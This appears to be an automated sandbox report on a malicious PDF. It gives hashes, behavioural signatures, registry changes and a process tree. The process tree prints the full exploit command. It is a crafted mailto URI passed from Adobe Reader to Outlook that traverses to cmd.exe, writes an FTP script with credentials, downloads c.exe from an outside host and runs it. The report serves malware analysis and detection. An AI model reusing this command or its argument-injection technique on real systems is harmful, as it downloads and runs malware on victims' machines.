Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
12-02-2024 15:25
Behavioral task
behavioral1
Sample
977c984367355f590a8bb159f76d94d9.pdf
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
977c984367355f590a8bb159f76d94d9.pdf
Resource
win10v2004-20231222-en
General
-
Target
977c984367355f590a8bb159f76d94d9.pdf
-
Size
14KB
-
MD5
977c984367355f590a8bb159f76d94d9
-
SHA1
1a1a1c77da9a62caae618745be5e2dac76afe56f
-
SHA256
25830eecbe144320cf5e74614e967b0f272a4362a801665258ad67c1255bb7d2
-
SHA512
2af47e7cf4b73ce007253206bf256d2c10d8969202fd04d9c7e83c06c0b4adecc7a4d926536c9b36b10d71eff1eca76ce414f2d0918039595bd4c76796c1b47b
-
SSDEEP
192:vJs0bjJqccyZxcqXtTJWuZ2yvO9Y+j1MK8kM7kMNzpFh4lMJ:R5pqwttTIs0pCfNTpr4qJ
Malware Config
Signatures
-
Drops file in System32 directory 14 IoCs
Processes:
OUTLOOK.EXEdescription ioc process File created C:\Windows\system32\perfc00A.dat OUTLOOK.EXE File created C:\Windows\system32\perfc00C.dat OUTLOOK.EXE File created C:\Windows\SysWOW64\PerfStringBackup.TMP OUTLOOK.EXE File opened for modification C:\Windows\SysWOW64\PerfStringBackup.INI OUTLOOK.EXE File created C:\Windows\system32\perfh009.dat OUTLOOK.EXE File created C:\Windows\system32\perfc011.dat OUTLOOK.EXE File created C:\Windows\system32\perfh011.dat OUTLOOK.EXE File created C:\Windows\system32\perfc007.dat OUTLOOK.EXE File created C:\Windows\system32\perfh007.dat OUTLOOK.EXE File created C:\Windows\system32\perfh00A.dat OUTLOOK.EXE File created C:\Windows\system32\perfc010.dat OUTLOOK.EXE File created C:\Windows\system32\perfh010.dat OUTLOOK.EXE File created C:\Windows\system32\perfc009.dat OUTLOOK.EXE File created C:\Windows\system32\perfh00C.dat OUTLOOK.EXE -
Drops file in Windows directory 3 IoCs
Processes:
OUTLOOK.EXEdescription ioc process File created C:\Windows\inf\Outlook\0009\outlperf.ini OUTLOOK.EXE File created C:\Windows\inf\Outlook\outlperf.h OUTLOOK.EXE File opened for modification C:\Windows\inf\Outlook\outlperf.h OUTLOOK.EXE -
Processes:
OUTLOOK.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt OUTLOOK.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" OUTLOOK.EXE Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar OUTLOOK.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" OUTLOOK.EXE Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote OUTLOOK.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" OUTLOOK.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" OUTLOOK.EXE Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel OUTLOOK.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" OUTLOOK.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
OUTLOOK.EXEpid process 2108 OUTLOOK.EXE -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
OUTLOOK.EXEAcroRd32.exepid process 2108 OUTLOOK.EXE 2956 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
AcroRd32.exepid process 2956 AcroRd32.exe 2956 AcroRd32.exe 2956 AcroRd32.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
AcroRd32.exedescription pid process target process PID 2956 wrote to memory of 2108 2956 AcroRd32.exe OUTLOOK.EXE PID 2956 wrote to memory of 2108 2956 AcroRd32.exe OUTLOOK.EXE PID 2956 wrote to memory of 2108 2956 AcroRd32.exe OUTLOOK.EXE PID 2956 wrote to memory of 2108 2956 AcroRd32.exe OUTLOOK.EXE PID 2956 wrote to memory of 2108 2956 AcroRd32.exe OUTLOOK.EXE PID 2956 wrote to memory of 2108 2956 AcroRd32.exe OUTLOOK.EXE PID 2956 wrote to memory of 2108 2956 AcroRd32.exe OUTLOOK.EXE PID 2956 wrote to memory of 2108 2956 AcroRd32.exe OUTLOOK.EXE PID 2956 wrote to memory of 2108 2956 AcroRd32.exe OUTLOOK.EXE
Processes
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\977c984367355f590a8bb159f76d94d9.pdf"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2956 -
C:\PROGRA~2\MICROS~1\Office14\OUTLOOK.EXE"C:\PROGRA~2\MICROS~1\Office14\OUTLOOK.EXE" -c IPM.Note /m "mailto:test%25../../../../../../../../windows/system32/cmd%22.exe%22%22%20/c%20/q%20%22@echo%20off&echo%20dinozavr_ftp0%3Ed&echo%20sDs1LSWZ%3E%3Ed&echo%20binary%3E%3Ed&echo%20GET%20/i%20c.exe%3E%3Ed&echo%20bye%3E%3Ed&ftp%20-is:d%20cgi18.hqhost.net%3Enul&del%20/q%20d&@start%20c.exe&%22%20%22&%22%20%22nul.bat%22.cmd"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
PID:2108
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
230KB
MD52592d0de4e35b4cb0091316d3654e491
SHA131a82f183f4a9668b49189c12ab50382f02c952a
SHA256e34318f3ccba08f03adeb8f7ec9d780340d4401d2f8e7ec4d4c81facad5495f1
SHA512c8b6f727fe538bca34204111205f2f579b3e55d5490e52ac5a0ed950ae740a178b27693bbd0e5a2ee3b172fdbe3ec1a5468f1e9de0a272dc75a3dc22a132a72e
-
Filesize
1KB
MD548dd6cae43ce26b992c35799fcd76898
SHA18e600544df0250da7d634599ce6ee50da11c0355
SHA2567bfe1f3691e2b4fb4d61fbf5e9f7782fbe49da1342dbd32201c2cc8e540dbd1a
SHA512c1b9322c900f5be0ad166ddcfec9146918fb2589a17607d61490fd816602123f3af310a3e6d98a37d16000d4acbbcd599236f03c3c7f9376aeba7a489b329f31
-
Filesize
3KB
MD59edff29076fc02b73344ab9c097e8843
SHA192ac67ab37a22cde2fe960a11d4f85c334139ea7
SHA25608e08eb12cf799633f081ff6b9df8d6dc023448078afb0a6a80607b6d2bed43d
SHA5120ccb3f99f31b3307653904e21e2ad82894433019fb52946d83217af2526d52c5048d484f81caf4cf860632adb5fa712cb3b4cda41da9ea0197d426db64c61bb9